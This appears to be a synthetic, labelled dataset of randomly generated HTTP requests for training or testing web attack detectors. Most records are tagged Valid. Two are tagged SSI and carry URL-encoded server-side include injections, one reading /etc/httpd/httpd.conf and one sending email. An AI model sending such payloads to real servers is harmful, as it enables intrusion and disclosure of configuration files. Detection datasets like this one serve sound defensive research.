User-Agent: yVQUV-W http://www.cutio.com
UA-CPU: PowerPC
UA-Disp: 0717,4017,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 948x5637
Via: 9.6 119.40.113.2, HTTP/1.3 www.hlott.js:8558, FTP/5.5 187.194.132.102
Transfer-Encoding: gzip
Upgrade: nmyio/6.6
Warning: 798 www.leeOy.tiff "xtasHAn" 
X-Forwarded-For: 199.237.53.206
X-Serial-Number: 4054998
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11073
Start - Id: 9103
class: Valid
GET /f7aAdaencef/l1ccxIM1Wxh/nPmih/ipds7phklcaa7stpe4/etahi8re/KCIkUlFeamG/6YUx@FFH1gOzIR7d/wPlSeK.mdb?eaia=7%40usr HTTP/1.0
Host: 223.148.83.79
Connection: dsheh3e
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.5
Cache-Control: min-fresh=08
Client-ip: 199.165.30.81
Cookie: b0saio=nLu-mdm
Cookie2: $Version="4"
Date: Mon, 18 Sep 06 04:43:51 CET
ETag: "V6QvKH2naWZH6U2b"
Expect: 100-continue
From: eo0inrr@xinaejal.fr
If-Modified-Since: Mon, 17 Sep 07 23:21:36 UTC
If-Unmodified-Since: Fri, 05 Oct 07 01:02:13 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9575
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: NTLM d3R5YWF1ZWVBaXRIb2VpdDF0ZW8zZWhlZXYwaG5rbDRlc2ZhbmJmZHVzdGRydXJh
Authorization: Digest realm
Range: 5-2964,5413-877878,632-
Referer: /8fRto/zoee5Her/atdee.html
TE: trailers,chunked;q=0.7,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.5 (Machintosh; U; PPC Mac OS X 2.4; va-eM; rv:4.2.3) Gecko/16685667
UA-CPU: Sparc
UA-Disp: 6130,9479,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 9463x953
Via: eoe/5.5 www.pefisp.tiff, 5.8 www.retmRdk4.gif
Transfer-Encoding: compress
Upgrade: nAzm/6.2, yh8o/8.1
Warning: 284 243.236.131.97 "ecoowdcc2ipb" "Fri, 03 Apr 09 17:35:41 CET"
X-Forwarded-For: 44.108.222.96
X-Serial-Number: 442361
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9103
Start - Id: 13855
class: Valid
GET /iCF_SO/Mns8qZ.utqUk/1W_W_fYMI5AVT/ow/Dnsdnooeadk/eGXVcTWCfH5bG/rYQ/laAug1bPeq.1e4/em/ak9ky9yBJJU_NvsZg7VQ/4Dw/ar2N8Ohsetsreluytar.jpeg?hahseso=2058&nonrt7btN8=tohhtacces1itil&nitt1s=5316356308 HTTP/1.1
Host: www.uwrrrbcl.net
Connection: close
Accept: image/gif;q=0.8, audio/*;q=0.3
Accept-Charset: iso-8859-4;q=0.2, iso-2022-jp, x-mac-turkish;q=0.4
Accept-Encoding: 
Accept-Language: rnozw-JiiLh, earn-9o7asr;q=0.6
Cache-Control: only-if-cached
Client-ip: 124.143.227.1
Cookie: access_log8kDJ0zb=93340;ceaa=063251;-9XAB=eeba;nmRmbshdtrygOae=410494263;Ddht=190163166
Cookie2: $Version="94"
Date: Sat, 18 Jun 05 06:55:42 GMT
ETag: "JbPqIQZaI.89rmc-"
Expect: aceiilri
From: icse@bldetb.uk
If-Modified-Since: Wed, 07 Jan 09 02:54:57 CET
If-Unmodified-Since: Sat, 14 Apr 07 11:02:02 CET
If-Match: "DlA1TFnt572hfOFuB.Da"
If-None-Match: "1V_@JCF.S3xLs-58vGro"
If-Range: Tue, 06 May 08 14:20:36 CET
Max-Forwards: 08
MIME-Version: 4.6
Pragma: ia='vh'
Proxy-Authorization: Digest uri=http://jtniUa0.be/sshsYek/edee/srituvaa/attl.msf
Authorization: NTLM cmVoZXVvQWVja3NzbnZpZG01bHNndGhvc21pNG1hZWo=
Range: -123,26781-4709
Referer: http://www.1rdiee.net/ulomro/hepx.php
TE: deflate,trailers,deflate
Trailer: If-Unmodified-Since
User-Agent: 6x1eamteuaAe
UA-CPU: 68000
UA-Disp: 4060,2972,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 750x449
Via: ilrkoT/8.5 www.miaeha.shtml, 5.5 www.raSsli.gif:2074, HTTP/4.9 139.110.208.182
Transfer-Encoding: identity
Upgrade: dee/6.6, qx6San/1.4, EaHU/5.9, nHtl/9.9, narr/5.4
Warning: 484 241.93.184.248:77 "o0ohbhcf" "Fri, 27 Apr 07 20:20:14 UTC"
X-Forwarded-For: 60.209.218.9
X-Serial-Number: 2424153746137739
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 13855
Start - Id: 39789
class: SSI
GET /xP/taI2OIxNRG00YKA/tP2CGM.mspx?utrtceupeodeba=296640576&eic4BusrYl=147&nw1nntcren=6&ud=245285857&FGREetZPG=336946&ReEio9Hobhji=%3C%21--++%23include++++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+--%3E&k8eda=9065506&hp=f1n5eRido%3CaRvg%28i&1Etyaru=6605642282&iZeUl=jYU68Mbd&tcnze=5583748&GW4Mmeta-fx.LZ3=ihpevfa HTTP/1.0
Host: 202.33.18.196
Connection: rblunnu
Accept: text/xml;q=0.6
Accept-Charset: *;q=0.9
Accept-Encoding: deflate;q=0.3, identity;q=0.6
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 129.26.179.125
Cookie: me=hnhitaaaselect;heneiia7tatbial=ns@YYrNu;nr=4404926;xik=o2GvR0c3pPxH;sznrreiahho=0dlEr
Cookie2: $Version="9"
Date: Sun, 10 Apr 05 23:09:57 UTC
ETag: W/"Ne7FULYkvbu.-BWNg_8"
Expect: ailel=ewuid;sddttdad
From: otit3le@ijlhneot1o.com
If-Modified-Since: Wed, 25 Mar 09 02:34:25 CET
If-Unmodified-Since: Sat, 25 Apr 09 15:44:44 GMT
If-Match: "bHJKkxda8xbD6vUFfSP"
If-None-Match: "QkGjakNT_idqLCD_P@U"
If-Range: Mon, 14 Feb 05 17:45:30 UTC
Max-Forwards: 5732
MIME-Version: 2.0
Pragma: i=no
Proxy-Authorization: Digest username="usl1mwH3"
Authorization: NTLM b1JSc0VobndhOTllZW1JenR2a2xzZG5lb2RGNXBYN25xcGk4aHllNA==
Range: 538-81062,0-593619
Referer: http://www.hiAsmfn.ch/5ftpayf/Awllyo/rau6o8E.php3
TE: gzip,chunked;q=0.2
Trailer: Upgrade
User-Agent: Mozilla/7.6 (X11; U; Linux i386 1.3; ur-io; rv:4.6.4) Gecko/85882815
UA-CPU: Sparc
UA-Pixels: 181x202
Via: FTP/5.9 www.snhelRO2.css, 6.3 www.amdrli.shtml, HTTP/3.4 105.227.173.161
Transfer-Encoding: deflate
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
X-Serial-Number: 39977076241136
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39789
Start - Id: 20115
class: Valid
GET /ul-EY78SX/55/epfeSms/saeeerlh.css?Ra7lefiodiHi3M=86919&8xwgt=x%7Em2k1Ermreamdf&cnopt8un=ancv0ckroreeLy&eAytwonhYu9eqpa=nfIeet+ompe&h1ea4=2&ejrh=hi%3Ac&we1alpwexrydu=3&yeyt=474846&yt5v9=9yu1Uwrto%25rac&childxJv=eNebHh%4020Pg&eoJpi9ft=kstckufia&klj9eeo8shr=4msakHK_.J.&sn4=7+&INRy2spmer7nfm=oeaReeCe4ee6us&5ledo=0vmxl2avmln+processing-instruction HTTP/1.0
Host: 123.51.37.247
Connection: bpeayE
Accept: */*
Accept-Charset: x-mac-arabic, isiri-3342;q=0.0, x-mac-roman, x-mac-hebrew;q=0.3, x-mac-icelandic;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 246.3.229.109
Cookie: ff=edsedeoE+lE;eo3ntdnuqdb=b<@ne Y;uSelt=bJ0LmIODHV;dmtic=3VjFZ
Cookie2: $Version="81"
Date: Wed, 13 Jan 10 01:04:48 UTC
ETag: "zn.IiEeDfV_qRyqiN"
Expect: 100-continue
From: t261O@oawcrm.be
If-Modified-Since: Sun, 19 Jun 05 01:17:26 CET
If-Unmodified-Since: Mon, 14 Aug 06 12:08:27 UTC
If-Match: "iTJbevqK3QPQmX4"
If-None-Match: "CPl9LF@A@_excCrE"
If-Range: Mon, 05 Mar 07 20:11:26 CET
Max-Forwards: 5
MIME-Version: 9.3
Pragma: coti='weesh'
Proxy-Authorization: 8dgRi tith2yiI=td0ke
Authorization: aoMoA rbnU=YhsEEmt
Range: 41-,-67213
Referer: http://inRst9zT.com/trtl/eg8tr/eEht/eaTicthr.tiff
TE: chunked;q=0.3,deflate,trailers
Trailer: Transfer-Encoding
User-Agent: thEr3x3y5f http://www.eoerge.fr
UA-CPU: Sparc
UA-Disp: 972,951,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 2082x0663
Via: 6.4 www.fbiTs.jpg, 5.5 173.31.230.68
Transfer-Encoding: aigm; qhoh=DopHnfI
Upgrade: nuqRd/7.5, ae4sn/3.4
Warning: 232 58.2.188.101 "uuiureanrift" "Sun, 28 Aug 05 06:35:42 CET"
X-Forwarded-For: 171.141.7.56
X-Serial-Number: 9909201039312
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 20115
Start - Id: 29456
class: Valid
GET /smYOQSxDMhoq3ie19nb/bxM51Phm-Ikya.exe?snse=aaeedscriptJarrteS&alaeqo06dh=azIneeEoh&es=55954721&eirkuOjs6ity=ieautca7hnmadohtO&t1mtEdlf=319563906&eplindE=859&me6hds8he3ilq=e&eEu0biihwrn=nIfcrTe0ezaihn-&mona=028080&e58kfe=Wbin8it+e+e7+esshobin2ea&QFkgX=gderuheotmlueaoi4 HTTP/1.0
Host: 208.15.216.206
Connection: close
Accept: image/*, application/rtf;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ya-tca;q=0.0, f4jcs-s;q=0.9, gtsti-thN, l-ruAeu, tot-Oobal3he
Cache-Control: no-cache
Client-ip: 38.179.162.14
Cookie: im5oHe2mblg=3794;csvbeygkZx=43524;659rSCGM=4;3SehnaiJsm=dYuVCbgKlPy
Cookie2: $Version="9"
Date: Tue, 03 Nov 09 21:06:12 GMT
ETag: W/"w5pNSv_EbPM6fZqgoA"
Expect: 100-continue
From: t1eoE@tZ2ugooad.ch
If-Modified-Since: Thu, 18 Oct 07 11:51:36 UTC
If-Unmodified-Since: Wed, 06 Jul 05 04:39:09 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 13 Jan 07 04:24:19 UTC
Max-Forwards: 3727
MIME-Version: 3.4
Pragma: Ii='eF'
Proxy-Authorization: Basic ZDFkcUw6ZW93NGNpcg==
Authorization: Digest algorithm=Ajoo
Range: -859475
Referer: http://i2itspna.net/reaayom/lcor6/qatitE1r.cgi
TE: chunked,deflate;q=0.7
Trailer: From
User-Agent: Mozilla/1.6 (Windows; U; Win98 0.6; ue-Dk; rv:7.3.0) Gecko/95672931
UA-CPU: Sparc
UA-Disp: 206,807,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6889x7208
Via: 6.7 www.qeiy.js, mfo/7.0 248.201.197.163:564, 3.7 www.cooste.css:1757
Transfer-Encoding: ored; ipxetnb=YdListos
Upgrade: prltnc/9.6, vtkuzg/2.7, rvtwsa/5.2, e7yuc/3.8
Warning: 881 224.80.69.65:4958 "uy4Z" 
X-Forwarded-For: 232.150.193.54
X-Serial-Number: 7353709606596802316
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29456
Start - Id: 8310
class: Valid
GET /ehomeco_.tiff?chv=seZC6S9ga&scfplYHeran=wr+n++&TwI.=tyjn19uNs2oinDroEt&eSnZop=48 HTTP/1.0
Host: 60.230.46.250
Connection: keep-alive
Accept: audio/x-wav;q=0.4
Accept-Charset: windows-1258;q=0.4, iso-8859-2, iso-2022-jp;q=0.4, iso-8859-8-i
Accept-Encoding: identity;q=0.8, compress, identity, deflate, compress
Accept-Language: taf-0L9, 9hee-m, 2yn-ndee, hrtsgr-s, ilTh-9r5aoitl;q=0.6
Cache-Control: max-age=0003
Client-ip: 46.174.173.182
Cookie: fgr107tEnepAlEb=6m8tmNt7H2B;wtgec0rAide=1EeLd;zehe=pcmhnaa
Cookie2: $Version="8"
Date: Mon, 14 Aug 06 10:15:52 GMT
ETag: "G@PdRo7ZT3D5GJ6d"
Expect: an8N=fteo;a5r0vn=nmngS
From: aleoapbf@soer.net
If-Modified-Since: Thu, 14 May 09 03:55:47 UTC
If-Unmodified-Since: Sat, 01 Apr 06 07:32:29 CET
If-Match: *
If-None-Match: "azpOG2U0ff_f9W5Cg3k"
If-Range: "wjnXpmUWRKd5RO7"
Max-Forwards: 182
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: gnEJt tans=e5Re
Authorization: Digest response="48B0BE168EB1d56a3c6d53dBE7baDCF0"
Range: -8236,5-800
Referer: http://5b4dQe.be/weeupc4/Hoeac/ctfoseas/eenitit/eeie.doc
TE: gzip,gzip
Trailer: If-Range
User-Agent: Mozilla/3.5 (Windows; U; Win 9x 2.6; mp-ae; rv:4.1.0) Gecko/37570991
UA-CPU: x86
UA-Disp: 858,824,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 138x587
Via: HTTP/7.6 www.imflH.htm, 8.2 www.deceed.png, HTTP/3.8 53.137.25.124
Transfer-Encoding: deflate
Upgrade: rREn/2.9, di70e5/6.8, Oae/2.0, tCr/0.8, vn7low/5.7
Warning: 477 203.254.244.133:8 "Cspr5Osssgcfn" 
X-Forwarded-For: 35.25.216.107
X-Serial-Number: 7108869767908
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8310
Start - Id: 35000
class: Valid
PUT /pscocieacyet4NNty.tiff? HTTP/1.1
Content-Length: 252
Content-Language: ebsiyr
Content-Encoding: identity
Content-Location: /p2st.php
Content-MD5: MmRhMWV2YTIyZjkxaHJuYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 16 Jun 09 21:29:51 CET
Last-Modified: Fri, 12 Mar 04 05:51:08 UTC
Host: 167.111.213.151
Connection: aeen
Accept: */*;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-stale=95
Client-ip: 221.151.35.250
Cookie: tanmorwsexcjEn=5;ihcztel=8072;og=8066;6RzdivS-9P=7xhcr;mqnntafqbin=1cH1lbszU;if56tte=2614
Cookie2: $Version="235"
Date: Mon, 16 Jul 07 13:00:17 UTC
ETag: "qIjJFkr0VMW6YYooyzM"
Expect: aln3DpiH
If-Modified-Since: Fri, 12 Aug 05 02:20:09 UTC
If-Unmodified-Since: Fri, 06 Feb 09 15:32:07 UTC
If-Match: "OBJqGhb3QL0dodP7sUZY"
If-None-Match: "jGHZev@roNQpc9e@47"
If-Range: Sun, 14 May 06 24:37:08 GMT
Max-Forwards: 299
Pragma: no-cache
Authorization: Digest uri=/oeijnoom/gxarbi7n/knalnxl/euoese.mdb
Range: 98-
Referer: http://ATdu.it/sesbpnse/oeito/rdrsee/EdRsl/asFpe.asp
TE: trailers,deflate;q=0.6,trailers
Trailer: If-Match
User-Agent: 4D3MtAG@uK http://www.f7erkrz.st
UA-CPU: MIPS
UA-Disp: 8291,831,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 3778x0485
Via: TMmcpi/8.4 www.Tdss.png, 0.7 www.hsqlegur.html
Transfer-Encoding: gzip
Upgrade: 6eanj/6.8, HH2n/1.0, dmi/6.2, ixeo/8.4
X-Forwarded-For: 151.22.66.165
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

oabr6t=aa9&ufN2fhsld=a7QA1dLSd&zf21TSteny9etJ=l$net+dc&gdg=9oha8a|eTtbjag&om=eudu grsoconnecthei&0dwaIC98.0R=lD65BWCT&UcopyBecmmU=651123&ta7en=Su&ryqHeki4kdti=tin2rd%Axpp57o)Nsid&KpassthruUdrop.cTOhdY=oN5m3as&x@hC1BRpsN@7=+etanjt&trt=icoF5p

End - Id: 35000
Start - Id: 39405
class: SSI
GET /ngwmoit/uFXG15b_jmbxtCAcRoK.dll?Mlgbtr15pr7oo=42&NwAM8fZ=hcXwIi_x&gea8rseyrWldpad=ocOkb2eenpu&lmlaea=%3C%21--%23email+fromhost%3D%22www.5sfhafne.com%22+tohost%3D%22mailbox.crS.com%22+message%3D%22aryne+onLnst+Smg+tom1bi%22+fromaddress%3D%22isd8.com%22+toaddress%3D%22eWnia.r5dtrs.com%22+subject%3D%22jii%22+sender%3D%22ectw.com%22+replyto%3D%22zi70r.com%22+cc%3D%22daiu%22+inreplyto%3D%22dttm+Oh5+6latm%22+id%3D%22bIluamail%22+--%3E&nin=E%5Cse7%28nir&OSMZ77ZMhaving=i60jFIyHik&eEl=t2%3Brnoa&reoso82qer=5818737450 HTTP/1.1
Host: 177.45.107.85:80
Connection: Uoohamo
Accept: video/mpeg
Accept-Charset: *;q=0.9
Accept-Encoding: gzip
Accept-Language: ttvuii-0;q=0.6, me-i, tgte-g8;q=0.0, 84tr-ii7nn, 9reab-R1
Cache-Control: no-cache
Cookie: idlIs9vckcgontv=adqidtnapt
Cookie2: $Version="6"
Date: Tue, 28 Sep 04 03:48:34 GMT
ETag: W/"25Kpjj4nIKKJBndjeb"
Expect: 100-continue
If-Modified-Since: Tue, 23 May 06 18:56:26 UTC
If-Unmodified-Since: Sat, 17 Jul 04 23:58:21 CET
If-Match: "Oipo4Gx_rl0vi@-"
If-None-Match: *
If-Range: *
Max-Forwards: 7529
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM cmVIZXluZm5vaXJ0ZWVtcDFoMXdudjJpbHd5Ym1pdHQ=
Authorization: NTLM d3NsdHVuZGwzcmdpN213blR0aXR0aTRkbnNhbGoxOGZrbHd3Sg==
Referer: /heoMltr/ntwc/laotsr/ncpan6.sh
Trailer: Via
User-Agent: h9e2KyzZ0 http://www.3aner.fr
UA-CPU: StrongARM
Via: FTP/5.8 www.btteco.gif, 8.6 74.56.56.252, 8.1 www.q25hh.gif
Transfer-Encoding: eeEnce
----: ---------------------------------

null

End - Id: 39405
Start - Id: 20362
class: Valid
GET /d9sreplace56@@cyC7dstyleg/tiOANouWdk2-/iqD2/loradenw/msnLy/la4Eb/eeO0fBuz.aspx?np7i1yr0t4rdmy=teihyenl&hivh=599974174&etdrtr=il1u HTTP/1.0
Host: 144.123.251.199
Connection: xtnfHngr
Accept: text/*, image/gif;q=0.3
Accept-Charset: windows-1250;q=0.0
Accept-Encoding: *
Accept-Language: sc0sEne6-mu;q=0.5, ihd-lz9nn1;q=0.2, Eiu-Ie
Cache-Control: Bd=e2ieRone
Client-ip: 154.221.244.163
Cookie: ro=r;labesmrug=9210038
Cookie2: $Version="534"
Date: Fri, 04 Aug 06 01:38:10 GMT
ETag: "EbDDSObU4FSkUAKQ5"
Expect: 100-continue
From: ueaw@nsel.fr
If-Modified-Since: Mon, 27 Apr 09 17:19:30 GMT
If-Unmodified-Since: Wed, 17 Mar 10 18:45:04 CET
If-Match: "ScV8WdFt.M9W5F5k"
If-None-Match: "7H2LUn5RgkghCIze"
If-Range: Sun, 22 Oct 06 05:05:10 GMT
Max-Forwards: 922
MIME-Version: 0.0
Pragma: dRrnl='brrio'
Proxy-Authorization: Basic bzJlZW50ZXA6dHdpYWU=
Authorization: NTLM b2VuNTRhRHRhVUJhcm9wcjV1SnJhbkJnYWp1b1JleDll
Range: 930847-82164,1-528510
Referer: http://www.ie6iE.be/tuaqlap/jZetlota/lovaldHd/ee9eigt.msf
TE: trailers,trailers,gzip
Trailer: Trailer
User-Agent: ri3aa/8.5
UA-CPU: Sparc
UA-Disp: 139,156,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 912x315
Via: FTP/8.2 www.tgfp.gif, HTTP/2.0 www.2tEni.html, 0.6 www.tedr.jpeg
Transfer-Encoding: gzip
Upgrade: nxt3/7.1
Warning: 906 176.243.168.21 "eorneinhwtfccewarec" 
X-Forwarded-For: 240.25.195.20
X-Serial-Number: 11331311370992169456
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20362
Start - Id: 23364
class: Valid
GET /aIx6Dk./C-GTjThlinkO/rtYqENOJXf.tiff? HTTP/1.0
Host: 144.104.225.31:9588
Connection: close
Accept: video/*, text/html;q=0.4, image/jpeg;q=0.2
Accept-Charset: *
Accept-Encoding: compress, gzip
Accept-Language: otrDpES-ioia;q=0.5, ehh9-y4x, ee-u03;q=0.9, o3unoy-tt
Cache-Control: only-if-cached
Client-ip: 254.183.167.167
Cookie: riteasrerH=m%; 
Cookie2: $Version="5"
Date: Mon, 05 Jun 06 13:33:42 UTC
ETag: W/"ev3ogQ.2gYTKJpa3R"
Expect: naAmapoi=ewmr;mrtoat
From: qecc6wa@Qsan.org
If-Modified-Since: Fri, 23 Jan 09 24:03:31 GMT
If-Unmodified-Since: Sat, 13 Aug 05 12:00:04 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Basic OW9lVHQ5OkNXOW9wcjZv
Authorization: tely Nkxo8iE=7tmeoIkc
Range: -83
Referer: /riaami.pl
TE: gzip;q=0.1,trailers,trailers
Trailer: Trailer
User-Agent: sHu3DwxL http://www.shtjAuZr.be
UA-CPU: StrongARM
UA-Disp: 3348,8883,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 026x806
Via: 6.8 www.oehsUrl.shtml, HTTP/8.1 73.137.50.112
Transfer-Encoding: oeimt; h0nirsdh=xqmt
Upgrade: Dueo/9.4, 8voi/8.8, xougi/8.4, ehan/4.9
Warning: 767 www.nutng.jpg "imrettlerf" "Thu, 18 Feb 10 04:49:03 GMT"
X-Forwarded-For: 143.52.19.171
X-Serial-Number: 996709990396001467
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 23364
Start - Id: 1319
class: Valid
GET /aPg.nsf?eDteteTuheelen=50&eee=76&t3aDma=om&tecLnae=+l&Sdi=53385&e9=n-5tQ&bSpperlN2B=o&8c2pbNdZttso=907231&6imi49=edifae7aaa&oed=0YylvOGGXQ5&ORTHB9=28&ntzpnni=61503723&bln3hitfiud3=088240 HTTP/1.1
Host: 123.40.31.131:80
Connection: keep-alive
Accept: */*
Accept-Charset: utf-7, euc-kr
Accept-Encoding: *;q=0.1
Accept-Language: srri7se-ebshet;q=0.8, J5nhieon-o;q=0.8
Cache-Control: only-if-cached
Client-ip: 58.67.184.51
Cookie: obQnFF=otoehwjt6noapced;a8eEagc=QsPd;aelsudaeCbm11Yu=06380211;aotqscissn=88
Cookie2: $Version="16"
Date: Wed, 12 May 04 06:20:06 CET
ETag: "HQ8uSCW@L4-@PRWl"
Expect: 2arTnecm
From: strldbE@9qmhittm.gov
If-Modified-Since: Tue, 23 Mar 04 01:44:14 GMT
If-Unmodified-Since: Fri, 06 Feb 09 23:10:09 CET
If-Match: *
If-None-Match: "of_XpcshRNOdr5qOX98"
If-Range: *
Max-Forwards: 1
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Basic aWd0ZGVzbTpyNGlhZQ==
Authorization: os0tte Hhcl=l6orCcng
Range: -216
Referer: http://toumee.st/8leat/amn2/oi4Fab.cgi
TE: deflate;q=0.5,gzip;q=0.3,chunked;q=0.5
Trailer: Accept-Language
User-Agent: oN-4cMn2 http://www.9oel.net
UA-CPU: Sparc
UA-Disp: 512,7635,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 290x591
Via: icv/7.7 190.61.29.93, HTTP/8.7 8.138.127.117, 1.4 www.mt3e.jpeg
Transfer-Encoding: esnisF
Upgrade: t7rs/3.9, wsOC/1.9, elcLbb/7.5, yutxee/3.6, sz6enA/6.2
Warning: 222 www.adbe.jpg "ebprbkhtcfatduen" "Mon, 20 Mar 06 12:05:20 UTC"
X-Forwarded-For: 47.248.188.232
X-Serial-Number: 6191285179418731
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1319
Start - Id: 7421
class: Valid
PUT /lurfzgiuais/i2du6oeace/vX7mGrmtK8/cGXH39@2Qn8c0ij.jpg? HTTP/1.1
Content-Length: 134
Content-Language: jw,rEe7,hkouc
Content-Encoding: identity
Content-Location: /iro5az.swf
Content-MD5: TG9paGFoYXBub1BmYUVubw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 16 Jan 09 04:14:55 GMT
Last-Modified: Sat, 18 Apr 09 02:29:55 GMT
Host: 135.74.28.172:80
Connection: au5u8
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: 4agyt9na-v2indeen;q=0.7, ogf-vdr;q=0.8
Cache-Control: no-store
Client-ip: 7.158.25.22
Cookie: goFKQyTzHR=iIs8;otihi=s-MU4l1;asf0qsciehc9=lys5e3e;cS1IDs=ynymWpot
Cookie2: $Version="18"
Date: Mon, 16 Feb 04 02:14:02 CET
ETag: W/"R7mkJrmbOH3Umca1"
Expect: sfbao7
From: etjre@ngegAdwy.net
If-Modified-Since: Wed, 03 Nov 04 01:00:02 GMT
If-Unmodified-Since: Sun, 18 Jan 09 08:41:53 CET
If-Match: "-u6YzIOOWogQoM4"
If-None-Match: *
If-Range: *
Max-Forwards: 823
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: asue bpcdhTC=a83idrez
Authorization: Digest nc=965bc9eD
Range: 1-587,1-,-06
Referer: http://t1tc.fr/s2Zl/tono9.cfm
TE: trailers,chunked;q=0.3
Trailer: If-Range
User-Agent: mjrlsboedf
UA-CPU: MIPS
UA-Disp: 0192,953,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9649x7067
Via: itsa/1.7 www.ueotx.html:842, 1.8 www.tIa5ntlp.tiff
Transfer-Encoding: ehteob; 1c4e=getrA
Upgrade: selgl/5.1, ho6t/0.1
Warning: 235 www.eancis.jpeg:3197 "utlefmea" 
X-Forwarded-For: 248.139.237.35
X-Serial-Number: 51648085743746
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

asOyzRLeoidt=ojgwtKA&ii=2fL2O@Bf&irnr=tE2'&ehooh= eeet we(TeaY h&e0eetae=n4m4Ami2OElL&va= knsb&6rixhttpse4winnt1H=nh pszmern?o

End - Id: 7421
Start - Id: 18999
class: Valid
GET /iOt.OZKKxa/afWk6xDPW/hz5owvbjeTeteTtDf/qFLZAuRhavingBE/in5neaieeLdti/nw./ygh4/atidur/system3-/ntonealA/dGaLq/or.mspx?5tiAf=82422&hol=5Ogroup+byge+n%28r%3Dh%25myy%25ee&ekrwOtspeml=mcdiMJyWBzG&eiil=6861961998&r6oEm6qs=5366&rlm=netloholso&oltewrfpl=elsheetthfn1sratoN&nlhewtitn1=catogcusttiZ&oa4yuE=uXKMrC2SUOm4&rPSm2O9=1783872&fif8li=c7UBN&gtubsr=105813&olonhn9hnhuo=6feraxqePhwvn&glS=ay5HzhNOmaild&e5Eg=7Tlaojunion HTTP/1.0
Host: www.fhg0ateeu.cz
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: deflate;q=0.4, deflate
Accept-Language: *
Cache-Control: no-store
Client-ip: 227.16.86.109
Cookie: location3Jw.QpZlog=yNp;22qrm7rimA= +enXstwFlr'weawhereu;fhtnTxEwphW=2O%1clmSe4won
Cookie2: $Version="958"
Date: Sat, 11 Mar 06 17:38:50 UTC
ETag: "v.fs8aP2gl-.Poow7ee2"
Expect: sm8vxht=gaal
From: l14gyjst@isddra.be
If-Modified-Since: Fri, 29 May 09 08:00:10 UTC
If-Unmodified-Since: Fri, 27 Aug 04 06:30:47 CET
If-Match: "Ld9u.KUisbrazHX5fF"
If-None-Match: "GX_S9rweC_cX44u9c@i"
If-Range: Sat, 21 Mar 09 10:16:49 UTC
Max-Forwards: 51
MIME-Version: 9.9
Pragma: dnltesa='n'
Proxy-Authorization: Digest username="elrscge"
Authorization: Digest nonce
Range: 2800-0168
Referer: http://www.Eeao.org/bha8m/s55oJT/t7en/aemisg/iros.jsp
TE: chunked;q=0.3,gzip
Trailer: User-Agent
User-Agent: rreeas6/2.9.3.5.6
UA-CPU: 68000
UA-Disp: 655,4589,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 249x219
Via: FTP/4.6 www.srmeere.shtml, HTTP/9.1 www.iEaEem.jpg, FTP/7.9 124.231.228.165
Transfer-Encoding: deflate
Upgrade: 2ns/8.9, khr/6.8, eHrrl/7.7
Warning: 169 www.heannrye.js "iiewmgoohytygohEPot0" "Tue, 01 Feb 05 02:54:07 CET"
X-Forwarded-For: 144.31.247.88
X-Serial-Number: 27260320301
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18999
Start - Id: 31207
class: Valid
